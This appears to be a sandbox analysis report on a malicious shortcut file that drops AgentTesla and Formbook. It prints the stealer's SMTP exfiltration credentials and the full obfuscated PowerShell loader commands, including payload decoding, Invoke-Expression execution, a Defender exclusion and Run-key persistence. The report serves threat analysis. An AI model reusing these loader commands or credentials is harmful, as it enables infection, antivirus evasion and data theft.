agenttesla | 62fab79e945bc629c110f21c9db37c8c0cc441ad15e73c1c1349fbef986b3789

Analysis

max time kernel
149s
max time network
155s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
02-04-2024 07:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

85e44c6e99f5f4043fc2c993b6fa633b_JaffaCakes118.lnk
Size

5.4MB
MD5

85e44c6e99f5f4043fc2c993b6fa633b
SHA1

21b3e0a10dd9798ef71fe073cdad7cfdadbfdeae
SHA256

62fab79e945bc629c110f21c9db37c8c0cc441ad15e73c1c1349fbef986b3789
SHA512

7c2f7183d40ac7bab91fa1a572c625e38e8f7ec848d54b7a937b6a33acc5868df3af72ae3a6187e8720303ff7aa7d00e7895ff77adfd504d8b394dacb34d30ff
SSDEEP

1536:U9I0i/p6qP3NUUSQryt/H7brkIYtppz5h5Z5S5k5+5L5XEYEpEz5d5zE/EVE/E/A:U94

Score

10^/10

agenttesla formbook en keylogger persistence rat spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
mail.abaamap.com.mx
Port:
587
Username:
info@abaamap.com.mx
Password:
)I#!TlzV9@Kk

Extracted

Family

formbook

Version

4.1

Campaign

Decoy

fortezza.tours

unicornoptical.com

freezeframegame.com

osocrossfit.com

cutass.com

zhongrisk.com

seasandoman.com

global-care-recruiting.info

whenwesaywehaveitwedo.com

mithlapainting.com

sandringhamdarlington.net

futurevalleycontracting.com

goochandhousego.pro

valentindimitrov.com

maple-events.com

yourcreditchoice.com

virginity.bid

electricindians.com

intlgcap.com

ternionathletics.com

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Formbook
Formbook is a data stealing malware which is capable of stealing data.
trojan spyware stealer formbook

AgentTesla payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/964-108-0x0000000000400000-0x000000000043C000-memory.dmp	family_agenttesla

Formbook payload 4 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/408-117-0x0000000000400000-0x000000000042E000-memory.dmp	formbook
behavioral2/memory/408-130-0x0000000000400000-0x000000000042E000-memory.dmp	formbook
behavioral2/memory/748-151-0x0000000000B90000-0x0000000000BBE000-memory.dmp	formbook
behavioral2/memory/748-171-0x0000000000B90000-0x0000000000BBE000-memory.dmp	formbook

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

cmd.exerundll32.exeWPmSHQjY348pIFB.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation	rundll32.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation	WPmSHQjY348pIFB.exe

Executes dropped EXE 4 IoCs

Processes:

WPmSHQjY348pIFB.exeePmSHQjY348pI3E.exeePmSHQjY348pI3E.exeWPmSHQjY348pIFB.exe

pid process

2020 WPmSHQjY348pIFB.exe
3916 ePmSHQjY348pI3E.exe
964 ePmSHQjY348pI3E.exe
408 WPmSHQjY348pIFB.exe
Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid process

4152 rundll32.exe

pid	process
2020	WPmSHQjY348pIFB.exe
3916	ePmSHQjY348pI3E.exe
964	ePmSHQjY348pI3E.exe
408	WPmSHQjY348pIFB.exe

pid	process
4152	rundll32.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UserPreferencesDefault = "rundll32.exe C:\\Users\\Admin\\AppData\\Roaming\\userpref.dll,main"	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

ePmSHQjY348pI3E.exeWPmSHQjY348pIFB.exeWPmSHQjY348pIFB.execscript.exe

description	pid	process	target process
PID 3916 set thread context of 964	3916	ePmSHQjY348pI3E.exe	ePmSHQjY348pI3E.exe
PID 2020 set thread context of 408	2020	WPmSHQjY348pIFB.exe	WPmSHQjY348pIFB.exe
PID 408 set thread context of 3424	408	WPmSHQjY348pIFB.exe	Explorer.EXE
PID 748 set thread context of 3424	748	cscript.exe	Explorer.EXE

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 20 IoCs

Processes:

powershell.exepowershell.exeePmSHQjY348pI3E.exeWPmSHQjY348pIFB.exepowershell.execscript.exe

pid	process
904	powershell.exe
904	powershell.exe
1052	powershell.exe
1052	powershell.exe
964	ePmSHQjY348pI3E.exe
964	ePmSHQjY348pI3E.exe
408	WPmSHQjY348pIFB.exe
408	WPmSHQjY348pIFB.exe
408	WPmSHQjY348pIFB.exe
408	WPmSHQjY348pIFB.exe
2328	powershell.exe
2328	powershell.exe
748	cscript.exe
748	cscript.exe
748	cscript.exe
748	cscript.exe
748	cscript.exe
748	cscript.exe
748	cscript.exe
748	cscript.exe

Suspicious behavior: MapViewOfSection 5 IoCs

Processes:

WPmSHQjY348pIFB.execscript.exe

pid process

408 WPmSHQjY348pIFB.exe
408 WPmSHQjY348pIFB.exe
408 WPmSHQjY348pIFB.exe
748 cscript.exe
748 cscript.exe

pid	process
408	WPmSHQjY348pIFB.exe
408	WPmSHQjY348pIFB.exe
408	WPmSHQjY348pIFB.exe
748	cscript.exe
748	cscript.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

Processes:

powershell.exepowershell.exeePmSHQjY348pI3E.exeWPmSHQjY348pIFB.exepowershell.execscript.exeExplorer.EXE

description	pid	process
Token: SeDebugPrivilege	904	powershell.exe
Token: SeDebugPrivilege	1052	powershell.exe
Token: SeDebugPrivilege	964	ePmSHQjY348pI3E.exe
Token: SeDebugPrivilege	408	WPmSHQjY348pIFB.exe
Token: SeDebugPrivilege	2328	powershell.exe
Token: SeDebugPrivilege	748	cscript.exe
Token: SeShutdownPrivilege	3424	Explorer.EXE
Token: SeCreatePagefilePrivilege	3424	Explorer.EXE

Suspicious use of WriteProcessMemory 43 IoCs

Processes:

cmd.exepowershell.execsc.execsc.exerundll32.exeePmSHQjY348pI3E.exeWPmSHQjY348pIFB.exeExplorer.EXEcscript.exe

description	pid	process	target process
PID 3504 wrote to memory of 904	3504	cmd.exe	powershell.exe
PID 3504 wrote to memory of 904	3504	cmd.exe	powershell.exe
PID 904 wrote to memory of 1812	904	powershell.exe	csc.exe
PID 904 wrote to memory of 1812	904	powershell.exe	csc.exe
PID 1812 wrote to memory of 3624	1812	csc.exe	cvtres.exe
PID 1812 wrote to memory of 3624	1812	csc.exe	cvtres.exe
PID 904 wrote to memory of 2032	904	powershell.exe	csc.exe
PID 904 wrote to memory of 2032	904	powershell.exe	csc.exe
PID 2032 wrote to memory of 2184	2032	csc.exe	cvtres.exe
PID 2032 wrote to memory of 2184	2032	csc.exe	cvtres.exe
PID 904 wrote to memory of 2020	904	powershell.exe	WPmSHQjY348pIFB.exe
PID 904 wrote to memory of 2020	904	powershell.exe	WPmSHQjY348pIFB.exe
PID 904 wrote to memory of 2020	904	powershell.exe	WPmSHQjY348pIFB.exe
PID 904 wrote to memory of 3916	904	powershell.exe	ePmSHQjY348pI3E.exe
PID 904 wrote to memory of 3916	904	powershell.exe	ePmSHQjY348pI3E.exe
PID 904 wrote to memory of 3916	904	powershell.exe	ePmSHQjY348pI3E.exe
PID 904 wrote to memory of 4152	904	powershell.exe	rundll32.exe
PID 904 wrote to memory of 4152	904	powershell.exe	rundll32.exe
PID 4152 wrote to memory of 1052	4152	rundll32.exe	powershell.exe
PID 4152 wrote to memory of 1052	4152	rundll32.exe	powershell.exe
PID 3916 wrote to memory of 964	3916	ePmSHQjY348pI3E.exe	ePmSHQjY348pI3E.exe
PID 3916 wrote to memory of 964	3916	ePmSHQjY348pI3E.exe	ePmSHQjY348pI3E.exe
PID 3916 wrote to memory of 964	3916	ePmSHQjY348pI3E.exe	ePmSHQjY348pI3E.exe
PID 3916 wrote to memory of 964	3916	ePmSHQjY348pI3E.exe	ePmSHQjY348pI3E.exe
PID 3916 wrote to memory of 964	3916	ePmSHQjY348pI3E.exe	ePmSHQjY348pI3E.exe
PID 3916 wrote to memory of 964	3916	ePmSHQjY348pI3E.exe	ePmSHQjY348pI3E.exe
PID 3916 wrote to memory of 964	3916	ePmSHQjY348pI3E.exe	ePmSHQjY348pI3E.exe
PID 3916 wrote to memory of 964	3916	ePmSHQjY348pI3E.exe	ePmSHQjY348pI3E.exe
PID 2020 wrote to memory of 2328	2020	WPmSHQjY348pIFB.exe	powershell.exe
PID 2020 wrote to memory of 2328	2020	WPmSHQjY348pIFB.exe	powershell.exe
PID 2020 wrote to memory of 2328	2020	WPmSHQjY348pIFB.exe	powershell.exe
PID 2020 wrote to memory of 408	2020	WPmSHQjY348pIFB.exe	WPmSHQjY348pIFB.exe
PID 2020 wrote to memory of 408	2020	WPmSHQjY348pIFB.exe	WPmSHQjY348pIFB.exe
PID 2020 wrote to memory of 408	2020	WPmSHQjY348pIFB.exe	WPmSHQjY348pIFB.exe
PID 2020 wrote to memory of 408	2020	WPmSHQjY348pIFB.exe	WPmSHQjY348pIFB.exe
PID 2020 wrote to memory of 408	2020	WPmSHQjY348pIFB.exe	WPmSHQjY348pIFB.exe
PID 2020 wrote to memory of 408	2020	WPmSHQjY348pIFB.exe	WPmSHQjY348pIFB.exe
PID 3424 wrote to memory of 748	3424	Explorer.EXE	cscript.exe
PID 3424 wrote to memory of 748	3424	Explorer.EXE	cscript.exe
PID 3424 wrote to memory of 748	3424	Explorer.EXE	cscript.exe
PID 748 wrote to memory of 4432	748	cscript.exe	cmd.exe
PID 748 wrote to memory of 4432	748	cscript.exe	cmd.exe
PID 748 wrote to memory of 4432	748	cscript.exe	cmd.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3424

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\85e44c6e99f5f4043fc2c993b6fa633b_JaffaCakes118.lnk
2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3504

C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function mT($gL) {$mW = $Null;Get-ChildItem $gL -Recurse -Depth 1 -ErrorAction 'SilentlyContinue' | ? {$_.extension -eq '.lnk'} | % {$yq = [String](Get-Content $_.FullName);$pH = 'VXJKUHSCSOQOTVAQOTOSEHMTYRYGQZIM';$lG = $yq.IndexOf($pH);if($lG -ne -1) {$Gc = $yq.SubString($lG);$mW = $Gc.Replace($pH,'')}};return $mW};function P($z) {$G = [Text.StringBuilder]::New();for($UzG=0;$UzG -lt $z.Length;$UzG+=2){[void]$G.Append([char][int]('0x'+$z.Substring($UzG,2)))}return $G.ToString()}$mW = mT $(Get-Location).Path;if($mW -eq $Null) {$mW = mT $($env:TEMP)};$wb = [ScriptBlock]::Create((P $mW));$wb.Invoke();
3⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:904

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\44kdoyi4\44kdoyi4.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:1812

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6A62.tmp" "c:\Users\Admin\AppData\Local\Temp\44kdoyi4\CSCA69300019FF348FA85C610318387F358.TMP"
5⤵
PID:3624

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ws3plhm5\ws3plhm5.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:2032

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6B6C.tmp" "c:\Users\Admin\AppData\Local\Temp\ws3plhm5\CSC11EC4AB883324584A1118424AF585A4.TMP"
5⤵
PID:2184

C:\Users\Admin\AppData\Roaming\WPmSHQjY348pIFB.exe
"C:\Users\Admin\AppData\Roaming\WPmSHQjY348pIFB.exe"
4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2020

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\WPmSHQjY348pIFB.exe"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2328

C:\Users\Admin\AppData\Roaming\WPmSHQjY348pIFB.exe
"C:\Users\Admin\AppData\Roaming\WPmSHQjY348pIFB.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:408

C:\Users\Admin\AppData\Roaming\ePmSHQjY348pI3E.exe
"C:\Users\Admin\AppData\Roaming\ePmSHQjY348pI3E.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3916

C:\Users\Admin\AppData\Roaming\ePmSHQjY348pI3E.exe
"C:\Users\Admin\AppData\Roaming\ePmSHQjY348pI3E.exe"
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:964

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Roaming\userpref.dll,main
4⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4152

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $oUa = [string][char[]]@(0x66,0x75,0x6E,0x63,0x74,0x69,0x6F,0x6E,0x23,0x64,0x28,0x24,0x6C,0x29,0x23,0x7B,0x0D,0x0A,0x24,0x49,0x23,0x3D,0x23,0x5B,0x54,0x65,0x78,0x74,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x42,0x75,0x69,0x6C,0x64,0x65,0x72,0x5D,0x3A,0x3A,0x4E,0x65,0x77,0x28,0x29,0x0D,0x0A,0x66,0x6F,0x72,0x28,0x24,0x51,0x3D,0x30,0x3B,0x24,0x51,0x23,0x2D,0x6C,0x74,0x23,0x24,0x6C,0x2E,0x4C,0x65,0x6E,0x67,0x74,0x68,0x3B,0x24,0x51,0x2B,0x3D,0x32,0x29,0x7B,0x0D,0x0A,0x5B,0x76,0x6F,0x69,0x64,0x5D,0x24,0x49,0x2E,0x41,0x70,0x70,0x65,0x6E,0x64,0x28,0x5B,0x43,0x68,0x61,0x72,0x5D,0x5B,0x49,0x6E,0x74,0x5D,0x28,0x27,0x30,0x78,0x27,0x2B,0x24,0x6C,0x2E,0x53,0x75,0x62,0x73,0x74,0x72,0x69,0x6E,0x67,0x28,0x24,0x51,0x2C,0x32,0x29,0x29,0x29,0x7D,0x0D,0x0A,0x72,0x65,0x74,0x75,0x72,0x6E,0x23,0x24,0x49,0x2E,0x54,0x6F,0x53,0x74,0x72,0x69,0x6E,0x67,0x28,0x29,0x7D,0x0D,0x0A,0x66,0x75,0x6E,0x63,0x74,0x69,0x6F,0x6E,0x23,0x76,0x28,0x24,0x4F,0x29,0x23,0x7B,0x0D,0x0A,0x24,0x6C,0x23,0x3D,0x23,0x5B,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x42,0x69,0x74,0x43,0x6F,0x6E,0x76,0x65,0x72,0x74,0x65,0x72,0x5D,0x3A,0x3A,0x54,0x6F,0x53,0x74,0x72,0x69,0x6E,0x67,0x28,0x24,0x4F,0x29,0x0D,0x0A,0x24,0x6C,0x23,0x3D,0x23,0x24,0x6C,0x2E,0x72,0x65,0x70,0x6C,0x61,0x63,0x65,0x28,0x27,0x2D,0x27,0x2C,0x27,0x27,0x29,0x0D,0x0A,0x72,0x65,0x74,0x75,0x72,0x6E,0x23,0x24,0x6C,0x7D,0x0D,0x0A,0x66,0x75,0x6E,0x63,0x74,0x69,0x6F,0x6E,0x23,0x4D,0x28,0x29,0x23,0x7B,0x0D,0x0A,0x24,0x5A,0x23,0x3D,0x23,0x27,0x48,0x4B,0x43,0x55,0x3A,0x5C,0x43,0x6F,0x6E,0x74,0x72,0x6F,0x6C,0x23,0x50,0x61,0x6E,0x65,0x6C,0x5C,0x44,0x65,0x73,0x6B,0x74,0x6F,0x70,0x27,0x0D,0x0A,0x24,0x74,0x23,0x3D,0x23,0x47,0x65,0x74,0x2D,0x49,0x74,0x65,0x6D,0x50,0x72,0x6F,0x70,0x65,0x72,0x74,0x79,0x23,0x2D,0x50,0x61,0x74,0x68,0x23,0x24,0x5A,0x23,0x2D,0x4E,0x61,0x6D,0x65,0x23,0x27,0x55,0x73,0x65,0x72,0x50,0x72,0x65,0x66,0x65,0x72,0x65,0x6E,0x63,0x65,0x73,0x44,0x65,0x66,0x61,0x75,0x6C,0x74,0x27,0x23,0x2D,0x45,0x72,0x72,0x6F,0x72,0x41,0x63,0x74,0x69,0x6F,0x6E,0x23,0x53,0x69,0x6C,0x65,0x6E,0x74,0x6C,0x79,0x43,0x6F,0x6E,0x74,0x69,0x6E,0x75,0x65,0x23,0x7C,0x23,0x53,0x65,0x6C,0x65,0x63,0x74,0x2D,0x4F,0x62,0x6A,0x65,0x63,0x74,0x23,0x2D,0x45,0x78,0x70,0x61,0x6E,0x64,0x23,0x27,0x55,0x73,0x65,0x72,0x50,0x72,0x65,0x66,0x65,0x72,0x65,0x6E,0x63,0x65,0x73,0x44,0x65,0x66,0x61,0x75,0x6C,0x74,0x27,0x0D,0x0A,0x24,0x57,0x23,0x3D,0x23,0x76,0x23,0x24,0x74,0x0D,0x0A,0x24,0x70,0x23,0x3D,0x23,0x64,0x23,0x24,0x57,0x0D,0x0A,0x49,0x6E,0x76,0x6F,0x6B,0x65,0x2D,0x45,0x78,0x70,0x72,0x65,0x73,0x73,0x69,0x6F,0x6E,0x23,0x24,0x70,0x7D,0x0D,0x0A,0x4D) -replace ' ','';$FTX = [string][char[]]@(0x69,0x4E,0x56,0x4F,0x4B,0x65,0x2D,0x65,0x58,0x70,0x72,0x45,0x73,0x73,0x69,0x4F,0x4E) -replace ' ','';sal tWz $FTX;$oUa = $oUa.replace('#', ' ');tWz $oUa
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1052

C:\Windows\SysWOW64\autochk.exe
"C:\Windows\SysWOW64\autochk.exe"
2⤵
PID:3368

C:\Windows\SysWOW64\cscript.exe
"C:\Windows\SysWOW64\cscript.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:748

C:\Windows\SysWOW64\cmd.exe
/c del "C:\Users\Admin\AppData\Roaming\WPmSHQjY348pIFB.exe"
3⤵
PID:4432

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
223bd4ae02766ddc32e6145fd1a29301

SHA1
900cfd6526d7e33fb4039a1cc2790ea049bc2c5b

SHA256
1022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e

SHA512
648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ePmSHQjY348pI3E.exe.log
Filesize
1KB

MD5
8ec831f3e3a3f77e4a7b9cd32b48384c

SHA1
d83f09fd87c5bd86e045873c231c14836e76a05c

SHA256
7667e538030e3f8ce2886e47a01af24cb0ea70528b1e821c5d8832c5076cb982

SHA512
26bffa2406b66368bd412bf25869a792631455645992cdcade2dbc13a2e56fb546414a6a9223b94c96c38d89187add6678d4779a88b38b0c9e36be8527b213c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
1a7cb2c958fed2a19946910247a6bd8d

SHA1
096d10204554b23ed0094f94d86612dff53420e8

SHA256
0ea0baf7d52e32bc9808835ba578e2f6cd2affebb1855025edcc91f5d0a7fa9e

SHA512
72b6b31f9795613d3e84cb7b639186028c50a250bb68e1bcec5dbe3bf5487f64495ba103d16734de48771319dbeb7645732a9c63f4b027e273e94235a6f61af5

Download Submit
C:\Users\Admin\AppData\Local\Temp\44kdoyi4\44kdoyi4.dll
Filesize
3KB

MD5
c07ca427ebc758439206761e91e2454b

SHA1
d3df6cd862930e2426990f7b1866f5008b1fe4e3

SHA256
d9b2b863f1a4393a7d04259205ab1c2adc72b50a47d5b209d46bb61cc9722459

SHA512
a9aa8b416dd689eabd1ccdf71b0ef8f7ae05fbba778b84033519314a8a687abae2a8c3cdcf8b08fb545d0f37e5f1895db00cc6fdb48b7e3e8206b7b56cf24180

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES6A62.tmp
Filesize
1KB

MD5
105e09c5ace41876c9945bf72440c8ac

SHA1
16ab5437505fc9f27fae9f6788f7ff07b247ca90

SHA256
34a7b2a274d7736381450ffb3083119eec93174973d34e07e7165c522e893888

SHA512
ee210a686e472af22c7bf8d5fb643d452908b2e493524862b041820470c429c7cb17bb2b28286a349c8eb3f4a98a92c33faf3d77b50a66d816f5b190f395aafc

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES6B6C.tmp
Filesize
1KB

MD5
45d69c944cf5049099a4e5b4c0e89d68

SHA1
67c4268e4c57cdda01fcd2cb02e167b9b5b8ac46

SHA256
d3d1469eb869624529b0734828f1955954d2b3dce237588f6c7a94839c1090f3

SHA512
009f28b4fe7a4333b21058d7d080ff62e1035f912be9fd7238b6315efaa0becf338f7ca10b56d8096d5d7e7ee3bef251aace27345e7318edd2250db4607a9dd4

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hcbalzd1.xcq.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ws3plhm5\ws3plhm5.dll
Filesize
3KB

MD5
aaf16059d4022218bea5a1616d1c59d4

SHA1
9898fa3721c4997050e2335b4c122265065f3549

SHA256
1cfe18ff5b78b191e28edfb54de2e770bfa3d3978816dcaf71ddae82ce31fb47

SHA512
9b1cd6d1426d33ee8dd8cc3136d59a01edccd23be6e53ab836b139d9d946e7ff4a499df67ab737089817ec34a1f571aeb8c9dccf812668149175fd1b836abc61

Download Submit
C:\Users\Admin\AppData\Roaming\WPmSHQjY348pIFB.exe
Filesize
658KB

MD5
2620dc7fb3253116bacda0b5edaf27d3

SHA1
7d2d0b70770d7e7f94bcb3d38d2eeba5b25d14e3

SHA256
5c9f46bbd04381ba4acbeae46924894bf18b5982171c71c14f8e669312de01b3

SHA512
207b50bc49898aabcbe6310bd48b9ee823866891c872162d7fe229b6ebe153ab8b4ef8b86152c0120874a4ac3af13c7a4d2e6e02c38d6e4a5ae0e05c18c62148

Download Submit
C:\Users\Admin\AppData\Roaming\ePmSHQjY348pI3E.exe
Filesize
699KB

MD5
aa5537a757a0d71658cc29410a73827e

SHA1
a4cdf6bea0b141afcf2bc2b3aeae9f9c07b23f42

SHA256
9ca64b1a5aa9526120827a68766d0e4c5d7e6b35d4729af573d88b0cf81f53ae

SHA512
81593a59e8e1503af981d034b7c21339b815c3cb58218e60219b0af2f9bf9e5f91749d546e08251ce684e2469ae7c238e72b2e84afd664d459a63ba8e277a0d1

Download Submit
C:\Users\Admin\AppData\Roaming\userpref.dll
Filesize
17KB

MD5
5b2e8b0887e41ff72ac66799beeccb90

SHA1
82bbe01b7a2cb252892a5bed5d5af58fb641cd38

SHA256
739d52cf78560ab2c1dcd0f272006549d15312f0dcccc420bf669717422da441

SHA512
3ec6ef1bcdc2472e1edb1ecf578496a1194ef0e8de50bc47b270d6b23955ea7250c268b7bbe109b8b5df3c2610c952b59bd7ced6823dc22215183d53e7ad7e53

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\44kdoyi4\44kdoyi4.0.cs
Filesize
445B

MD5
c0136606a60235ac4eedf5ebfbf72242

SHA1
3adc968e7d42959b5b6892ad9836b9e5a7a80247

SHA256
36a3409023121f56e60418e19521f1241ee5ab41b8c299d04c53fe63a83a054f

SHA512
1c09303dc198f6cd9d2f2f73290089f3d4056379e4f76ec081871b06b920b5e548b017a047eeadcb535761f5c436f6a4abec7a848337c1fe65209d9cf43abaed

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\44kdoyi4\44kdoyi4.cmdline
Filesize
369B

MD5
b9bae660fee0efb87ea7ca2d87075fa1

SHA1
0fabd884e8a13bb53a986ac767a682ed1d584f6c

SHA256
84672bff50018c932904158680326f639f77eb0faf79af02404d1aadd8d95318

SHA512
330e6bd65df89bb7a9a279899a894c543e430d0812da5bbed68697532c4de94f60af09bdc5c9617e1adb294fa1e23e6dec48bab5583cc6da90dc27afb8c1bada

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\44kdoyi4\CSCA69300019FF348FA85C610318387F358.TMP
Filesize
652B

MD5
04ef1123c24df81003dab587589e0ff2

SHA1
f39826eb7cd130e778e7e82c32e613e6eb952798

SHA256
e410fd4b39f160fae57feb26c7b585f3ffb48c1e938899380b3810a9012d20b8

SHA512
3d9f019942a966427a8a99ac2a74e51e1703c14abadb8b530584bf322260300aa8b3521fe00596b20dc8d8fecd4d468962a810fa08351638b4d7266fc3f6c823

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ws3plhm5\CSC11EC4AB883324584A1118424AF585A4.TMP
Filesize
652B

MD5
98cb453568fe2f03b9f006cbd3b88c1f

SHA1
ba43d5ca61b6c83cb35d4e8c0d3b90fee2820018

SHA256
25c5de2e69e9945490019c5e5f6860d64058c769d8453952088cdb665242efe1

SHA512
e72d4369a7a8d558ea24705458180b2eb8e7369d08426850fef777c321955f826a8c9dd724538e6a1d9daea19fa4158921e6f842e01fb2b6043c41472a7c6579

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ws3plhm5\ws3plhm5.0.cs
Filesize
292B

MD5
7e8be7de46cb8a991a864885286e1db9

SHA1
600af06d154bc655d186b295205542a049957ae8

SHA256
2d66ad50bdbe759adf78a4f7de6f39c4d98b49ad83083eae1ea95130affa9ac4

SHA512
b0b01f8cad3150c16dbcc198ad15ed2c117bbfcfd5969438646b7c10de95939f238775e0faf7404e633232cfee55281a25b8d3762c0542cb3d2df9def4ba9653

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ws3plhm5\ws3plhm5.cmdline
Filesize
369B

MD5
b33deecfc86298c926fd881af1b35b06

SHA1
5e65602e75b01e8838194959b1c8cea5bc7ba212

SHA256
f08f8ac3c3ac6f7a37e6be989db4c5edfa7ae20ba72f9d608f15bcdf843b2007

SHA512
d519aa3afea45d67e40bcb3613a6ae05117d545f7767ce2b954156dbb7e61ca44e5a36d384c6b6954ab3634919d3f01a7a65eb7df85d423d8aac677402998280

Download Submit
memory/408-129-0x00000000005E0000-0x00000000005F4000-memory.dmp

Filesize
80KB

Download
memory/408-130-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download
memory/408-126-0x0000000000E80000-0x00000000011CA000-memory.dmp

Filesize
3.3MB

Download
memory/408-117-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download
